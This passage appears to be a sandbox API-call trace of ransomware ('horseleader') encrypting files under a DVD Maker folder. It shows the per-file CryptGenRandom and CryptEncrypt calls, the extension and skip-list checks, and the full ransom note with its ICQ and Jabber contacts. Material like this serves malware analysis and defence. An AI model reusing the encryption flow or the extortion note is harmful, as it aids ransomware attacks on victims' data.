0x0 [0251.729] lstrcmpW (lpString1="push.png", lpString2="#Decrypt#.txt") returned 1 [0251.729] lstrcmpW (lpString1="push.png", lpString2="_uninstalling_.png") returned 1 [0251.729] lstrlenW (lpString=".testttjffg") returned 11 [0251.729] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push.png", lpSrch=".testttjffg") returned 0x0 [0251.729] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.729] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.730] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\push.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.730] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f3ae97b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f3ae97b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee4ccd1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb92, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="pushplaysubpicture.png", cAlternateFileName="")) returned 1 [0251.730] lstrcmpiW (lpString1="pushplaysubpicture.png", lpString2="Windows") returned -1 [0251.730] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\pushplaysubpicture.png") returned 75 [0251.730] StrStrIW (lpFirst="pushplaysubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.730] lstrcmpW (lpString1="pushplaysubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.730] lstrcmpW (lpString1="pushplaysubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.730] lstrlenW (lpString=".testttjffg") returned 11 [0251.730] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\pushplaysubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.730] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.730] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.730] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\pushplaysubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\pushplaysubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.730] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f38881e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f38881e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee4ccd1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb70, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="push_item.png", cAlternateFileName="")) returned 1 [0251.731] lstrcmpiW (lpString1="push_item.png", lpString2="Windows") returned -1 [0251.731] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_item.png") returned 66 [0251.731] StrStrIW (lpFirst="push_item.png", lpSrch=".horseleader") returned 0x0 [0251.731] lstrcmpW (lpString1="push_item.png", lpString2="#Decrypt#.txt") returned 1 [0251.731] lstrcmpW (lpString1="push_item.png", lpString2="_uninstalling_.png") returned 1 [0251.731] lstrlenW (lpString=".testttjffg") returned 11 [0251.731] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_item.png", lpSrch=".testttjffg") returned 0x0 [0251.731] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.731] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.731] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_item.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\push_item.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.731] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f3ae97b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f3ae97b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee4ccd1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbb8, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="push_title.png", cAlternateFileName="")) returned 1 [0251.731] lstrcmpiW (lpString1="push_title.png", lpString2="Windows") returned -1 [0251.731] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_title.png") returned 67 [0251.731] StrStrIW (lpFirst="push_title.png", lpSrch=".horseleader") returned 0x0 [0251.731] lstrcmpW (lpString1="push_title.png", lpString2="#Decrypt#.txt") returned 1 [0251.731] lstrcmpW (lpString1="push_title.png", lpString2="_uninstalling_.png") returned 1 [0251.731] lstrlenW (lpString=".testttjffg") returned 11 [0251.731] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_title.png", lpSrch=".testttjffg") returned 0x0 [0251.731] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.731] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.732] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_title.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\push_title.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.732] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f3ae97b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f3ae97b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee4ccd1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbb8, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="push_title.png", cAlternateFileName="")) returned 0 [0251.732] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.733] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\#Decrypt#.txt") returned 66 [0251.733] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.735] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.735] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.736] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.736] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.736] CloseHandle (hObject=0x158) returned 1 [0251.736] GetProcessHeap () returned 0x780000 [0251.736] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.736] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f38039d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa89306e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f3f2aea, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Rectangles", cAlternateFileName="RECTAN~1")) returned 1 [0251.736] lstrcmpiW (lpString1="Rectangles", lpString2="Windows") returned -1 [0251.736] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles") returned 58 [0251.736] lstrcmpW (lpString1="Rectangles", lpString2=".") returned 1 [0251.736] lstrcmpW (lpString1="Rectangles", lpString2="..") returned 1 [0251.736] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.736] GetProcessHeap () returned 0x780000 [0251.737] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.737] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\*") returned 60 [0251.737] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f38039d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa89306e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f3f2aea, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.739] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.739] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\.") returned 60 [0251.739] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.739] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f38039d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa89306e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f3f2aea, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.739] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.739] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\..") returned 61 [0251.739] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.739] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.739] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f955d49, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f955d49, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0251.739] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0251.739] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576black.png") returned 76 [0251.739] StrStrIW (lpFirst="1047x576black.png", lpSrch=".horseleader") returned 0x0 [0251.739] lstrcmpW (lpString1="1047x576black.png", lpString2="#Decrypt#.txt") returned 1 [0251.739] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0251.739] lstrlenW (lpString=".testttjffg") returned 11 [0251.740] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576black.png", lpSrch=".testttjffg") returned 0x0 [0251.740] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.740] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.740] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.740] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f9c8160, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f9c8160, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eebf0eb, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1928, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="1047x576_91n92.png", cAlternateFileName="")) returned 1 [0251.740] lstrcmpiW (lpString1="1047x576_91n92.png", lpString2="Windows") returned -1 [0251.740] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576_91n92.png") returned 77 [0251.740] StrStrIW (lpFirst="1047x576_91n92.png", lpSrch=".horseleader") returned 0x0 [0251.740] lstrcmpW (lpString1="1047x576_91n92.png", lpString2="#Decrypt#.txt") returned 1 [0251.740] lstrcmpW (lpString1="1047x576_91n92.png", lpString2="_uninstalling_.png") returned 1 [0251.740] lstrlenW (lpString=".testttjffg") returned 11 [0251.740] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576_91n92.png", lpSrch=".testttjffg") returned 0x0 [0251.740] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.740] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.741] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\1047x576_91n92.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\1047x576_91n92.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.741] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f9ee2bd, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f9ee2bd, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4eee5249, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb05, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="15x15dot.png", cAlternateFileName="")) returned 1 [0251.741] lstrcmpiW (lpString1="15x15dot.png", lpString2="Windows") returned -1 [0251.741] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\15x15dot.png") returned 71 [0251.741] StrStrIW (lpFirst="15x15dot.png", lpSrch=".horseleader") returned 0x0 [0251.741] lstrcmpW (lpString1="15x15dot.png", lpString2="#Decrypt#.txt") returned 1 [0251.741] lstrcmpW (lpString1="15x15dot.png", lpString2="_uninstalling_.png") returned 1 [0251.741] lstrlenW (lpString=".testttjffg") returned 11 [0251.741] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\15x15dot.png", lpSrch=".testttjffg") returned 0x0 [0251.741] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.741] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.741] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\15x15dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.742] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f9a2003, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f9a2003, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ef0b3a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x15f4, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="720x480icongraphic.png", cAlternateFileName="")) returned 1 [0251.742] lstrcmpiW (lpString1="720x480icongraphic.png", lpString2="Windows") returned -1 [0251.742] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\720x480icongraphic.png") returned 81 [0251.742] StrStrIW (lpFirst="720x480icongraphic.png", lpSrch=".horseleader") returned 0x0 [0251.742] lstrcmpW (lpString1="720x480icongraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.742] lstrcmpW (lpString1="720x480icongraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.742] lstrlenW (lpString=".testttjffg") returned 11 [0251.742] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\720x480icongraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.742] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.742] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.742] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\720x480icongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\720x480icongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.742] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa86831, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fa86831, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ef0b3a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.742] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.742] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_ButtonGraphic.png") returned 91 [0251.743] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.743] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.743] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.743] lstrlenW (lpString=".testttjffg") returned 11 [0251.743] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.743] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.743] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.743] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd 